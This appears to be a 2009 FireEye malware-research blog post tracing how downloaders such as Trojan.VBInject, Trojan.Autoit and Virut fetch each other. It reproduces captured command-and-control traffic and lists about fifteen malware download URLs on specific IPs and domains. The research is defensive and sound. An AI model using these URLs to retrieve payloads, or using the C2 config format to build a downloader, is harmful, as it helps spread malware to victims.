FireEye Malware Intelligence Lab

For a quick re-cap, here is the first GET request as mentioned in the Finjan report:

GET /ploads/eula.exe HTTP/1.1

followed by

GET /ldr/loadlist.php?version=1 HTTP/1.1

A quick look into my sandnet data identified eula.exe as Trojan.VBInject  which itself is a known generic downloader.

Here is a traffic snippet from my sandnet data:

GET /ldr/loadList.php?version=1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 76.73.21.186
Connection: Keep-Alive
HTTP/1.1 200 OK

Date: Mon, 09 Feb 2009 06:22:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 115
Connection: close
Content-Type: text/html


http://76.73.21.186/ldr/dl/zchMiB.exe
http://76.73.21.186/ldr/dl/part.exe
http://76.73.21.186/ldr/dl/minisvr4.exe

VBinject reads malware links from the HTTP response and installs them on the infected machine.  These downloads are also visible in Finjan's download report.  My next step was to traverse through all of my sandnet data in an attempt to find out how many malware samples have been seen downloading Trojan.VBInject. As expected, the results were quite interesting.

According to my limited sandnet data there were only two malware samples that ever downloaded Trojan.VBInject. One was Virus.Virut and the other was Trojan.Autoit. I have covered Virut in detail in a previous article where I described it as one of the biggest BotnetWebs, responsible for downloading lots of the other big botnets.  Is Virut the 1.9 million host botnet?  My guess is no.  Virut always relied on Trojan.Injector (another big malware download service) to download further components but in this case the VBInject download link was found to be hard coded into the Virut binary.  This is not the characteristics of a generic downloader/botnet which downloaded VBInject as the result of a botmaster command.

Here is a traffic snippet from that Virut sample while downloading Trojan.VbInject

So we are only left with Trojan.Autoit. Trojan.Autoit is a powerful malware download service and according to my data, it has been seen downloading both Hexzone and VBInject.  A perfect match, isn't it?

GET /0/x.php?hid=531e237606675012bef96b4bef939b8d&mhid=bd1de70c62b17015b639adb2d30f0f0b&version=7&name=Codec_v.1004.1.exe&os=WIN_XP&_=262604330120091 HTTP/1.1

User-Agent: AutoIt v3
Host: www.ophywmntzrtew.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 22 Mar 2009 08:17:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 750
Content-Type: text/html

[version]
version=16
update=http://reopsakwww.com/1/stubv16.exe

[fetch]
delay=20000

[ads]
delay=40
url=
[download_onconnect]

im000.exe=http://reopsakwww.com/up/im.exe

exer000.exe=http://reopsakwww.com/up/exer.exe



[download_once]

avimu000.exe=http://reopsakwww.com/up/avimu.exe
icv002.exe=http://reopsakwww.com/up/icv.exe
ppack000.exe=http://cn.king.cd/hk.exe

seo004.exe=http://reopsakwww.com/up/seo.exe
red000.exe=http://www.plumsauce.info/RED.exe
wr011.exe=http://reopsakwww.com/up/wr.exe
ndlcpt001.exe=http://76.73.62.2/ploads/dlcpt.exe
prox000.exe=http://reopsakwww.com/1/proxy.exe
icc1001.exe=http://reopsakwww.com/up/icc1.exe
icc2001.exe=http://reopsakwww.com/up/icc2.exe
luxe000.exe=http://reopsakwww.com/up/luxe.exe
1496a000.exe=http://reopsakwww.com/up/1496a.exe

As one can see, there are multiple instructions in the HTTP response which instruct Autoit to download and install additional malware components.

The URL mentioned under [version] is the updated version of VBInject itself.

The URLS under [download_onconnect] are downloaded each time VBInject connects to its CnC, where as the [download_once] urls are downloaded only once.

Is Autoit the botnet discovered by Finjan?  There is only one problem, according to Finjan the botnet CnCs were located in Ukrain, and the Autoit sample I analyzed was talking to www.ophywmntzrtew.info which is hosted in Malaysia.

address:      PIRADIUS NET
address:      Unit 21-3A, Level 21
address:      Plaza DNP 59, Jalan Abdullah Tahir
address:      Taman Century Garden
address:      80300 Johor Bahru, Johor
address:      Malaysia
phone:        +607 334 8605
fax-no:       +607 334 8605
country:      MY
changed:       20071003
mnt-by:       MAINT-MY-PIRADIUS
source:       APNIC

It looks as though all my efforts to track down the unknown botnet were fruitless.  I am still unsure.  On the bright side, in this process I managed to explore few new BotnetWebs and got a chance to verify the BotnetWeb concept based on data from other security vendors like Finjan.

I will try to cover Autoit in detail in my next article, for the time being let's just say Autoit is a BotnetWeb downloading second stage malware as shown below:

1. http://reopsakwww.com/1/stubv16.exe

Updated version of Autoit itself.

http://www.virustotal.com/analisis/8a8654fd12f28750120afa7fc46d3ac5

2. http://reopsakwww.com/up/im.exe

A Trojan which spreads through IM based social engineering.

http://www.virustotal.com/analisis/bdd4c9fd6f58350166be788dcac9b786

3. http://reopsakwww.com/up/exer.exe

This is interesting, exer.exe is Virut which itself is a very big BotnetWeb. We have already seen that in some cases Virut has downloaded VbInject and here Autoit is downloading Virut. In the world of BotnetWebs a child download can also be parent download. It's getting a little bit confusing here, but these all are things I've seen in my sandnet.  What starts as a small infection becomes massive as a series of sub infections, which downloads even more infections and so on.  This is how modern malware operates which I'm sure makes the job of the AV industry very difficult.  So some personal advice for our readers, whenever you find your AV reporting any infection on your system, you'd better re-image your system immediately.  A single infection left on your system can reinfect you with everything you thought you removed. However beware while taking a backup of your data files, malware like Virut (Virus + Trojan) can also infect executables (locally or on open SMB shares) by injecting its DNA and can infect HTML files by injecting malicious IFrames into them.  So if you are infected with Virut, better not back up your applications and web pages, leave them and recover them from some other sources.

http://www.virustotal.com/analisis/1278b779066e2c7d7007ccd161658486

These are the binaries mentioned under download_once, so there is a good chance that these are pay-per-install malware not owned by the actual botmasters.

4. http://reopsakwww.com/up/avimu.exe

AVs are confused on this, so am I.  Nothing can be said about it without a detailed analysis. I'll try to cover it in some future post.

http://www.virustotal.com/analisis/4b4f54d4d6a03f7930314f9e50c59fbb

5. http://reopsakwww.com/up/icv.exe

A famous backdoor and downloader know as TDSS.

http://www.virustotal.com/analisis/80bd8872089da6eae06957d579ee3cf4

6. http://cn.king.cd/hk.exe

IRC.SDbot, a famous IRC Bot.

http://www.virustotal.com/analisis/6f5704db0c301ac5752bf2e03e99b797

7. http://reopsakwww.com/up/seo.exe

Most AVs are calling this Trojan-Dropper.Win32.Wlord. Nothing detailed from my side right now.

http://www.virustotal.com/analisis/f75e5ef4f909865b82db901052107577

8. http://www.plumsauce.info/RED.exe

No great intel from my side at this moment, most AVS are calling it a downloader.

http://www.virustotal.com/analisis/f5b21231615f89aec50cb6235bce6c73

9. http://reopsakwww.com/up/wr.exe

A trojan/downlaoder , often seen downloading Rogue AVs.

http://www.virustotal.com/analisis/feacd3f71d1fca8b06e57b6e61fa4e36

10. http://76.73.62.2/ploads/dlcpt.exe

Trojan.VBInject.  It's discussed in detail in the beginning of this article.

http://www.virustotal.com/analisis/df3c929bab0975e1560fc85d76bb13cd

11. http://reopsakwww.com/1/proxy.exe

http://www.virustotal.com/analisis/7a8495c069ac220a32fd865e43c3c0fd

12. http://reopsakwww.com/up/icc1.exe

Trojan.Piptea, another powerful malware downloader.

http://www.virustotal.com/analisis/ede6257379f870edc572d33f58c0a3ca

13. http://reopsakwww.com/up/icc2.exe

http://www.virustotal.com/analisis/8275470c7c5b22e51c03fdf1c01f4748

14. http://reopsakwww.com/up/luxe.exe

Vundo a.k.a. Virtumonde.

http://www.virustotal.com/analisis/1552d5d75f2dc9fefa112e4afc14a34d

15. http://reopsakwww.com/up/1496a.exe

A generic downloader.

http://www.virustotal.com/analisis/8aa617bf286b02228b270c58c6dc3f46

The end picture is quite miserable.  Autoit downloaded dozens of other malware components including some of the most power mawlare downloaders like Virut and Trojan.VBInject  which further downloaded more malware components.  Here I try to plot all these downloads in a graphical form to make it easier to visualize.

Here is the Virut graph from my earlier post. Lets integrate it with the Autoit graph and see how the combined graph looks.

One can easily sense the level of cooperation these malware master minds must offer each other.  Maybe it's time for us in the security industry to come closer and show the same level of cooperation. As I always say, there are plenty of bad guys out there to keep us (the good guys) in business :).

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM